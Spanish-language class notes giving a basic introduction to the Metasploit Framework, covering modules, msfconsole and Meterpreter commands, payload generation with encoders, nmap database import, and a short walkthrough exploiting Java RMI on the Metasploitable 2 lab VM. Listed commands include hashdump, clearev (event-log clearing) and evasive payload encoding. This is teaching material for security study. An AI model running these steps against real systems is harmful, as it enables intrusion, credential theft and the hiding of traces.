Quinto encuentro

METASPLOIT FRAMEWORK(intro muy basica)

Metasploit es un framework desarrollado en ruby para codear y ejecutar exploits. Para interactuar con este framework es necesario usar msfconsole.

Fuente de lo siguiente: https://www.offensive-security.com/metasploit-unleashed/

MSF Modulos

Exploits

sSon modulos que usan payloads, en msf a un exploit sin payload se le dice auxiliary

Payloads, encoders, nops

  1. Payloads: codigo que corre en la maquina target
  2. Encoders: le da formato al payload
  3. Nops : No operations

Modulos primarios

/usr/share/metasploit-framework/modules

Modulos del usuario

~/.msf/modules

Todos los modulos son clases de ruby

MSF console

Comandos

  • use
  • back
  • check
  • connect
  • edit
  • grep: grep [option] pattern cmd
  • help
  • info
  • irb
  • jobs, kill
  • search
  • sessions (sessions -l, -i)
  • set
  • show options
  • show payloads
  • show encoders
  • unset
  • setg
  • use

PAYLOADS

Hay 3 tipos basicos

Singles -> self contained y standalone
Stagers -> Generan una conexion y van cargando stages mas pesadas
Stages -> componentes que descarga el stager

Otros payloads

INline, staged, meterpreter,passiveX,NoNX

Generando payloads

msf> use <exp>
msf(exp)> generate -b '\x00\x0A' -i 3 -t java 

Usando encoders msf(exp)> generate -e x86/shikata_ga_nai

BASE DE DATOS

msf> hosts
msf> servicios -p21
msf> help database
msf> db_status
msf> workspaces

Usando nmap en msf

Importar nmap scan msf> db_import /root/scanNmap

Usando nmap adentro de msf msf> db_nmap -A target

Exportar db_export -f xml /root/out.xml

Servicios

Podemos buscar por servicios msf> services -c name, info -s http

METERPRETER

Como funciona?

  1. ejecuta el stager inicial (bind,reverso,passivex,etc)
  2. se carga el dll
  3. se genera la conexion entre el target y el atacante
  4. meterpreter carga sus extensiones

Comandos basicos

  • help
  • background
  • cat,cd,pwd,ls
  • clearev
  • download
  • edit
  • execute
  • getuid
  • hashdump
  • ipconfig
  • migrate postmodule
  • ps
  • search
  • shell
  • webcam_list
  • getprivs

Ejemplo rompiendo rmi en metasploitable 2

$ systemctl start postgresql
$ msfdb init
$ msfconsole
msf> db_nmap target
msf> grep java search rmi
msf> use java_rmi_server
msf> show options
msf> set RHOST LHOST SRVHOST ,ETC
msf> exploit
meterpreter> getuid
No Comments
Back to top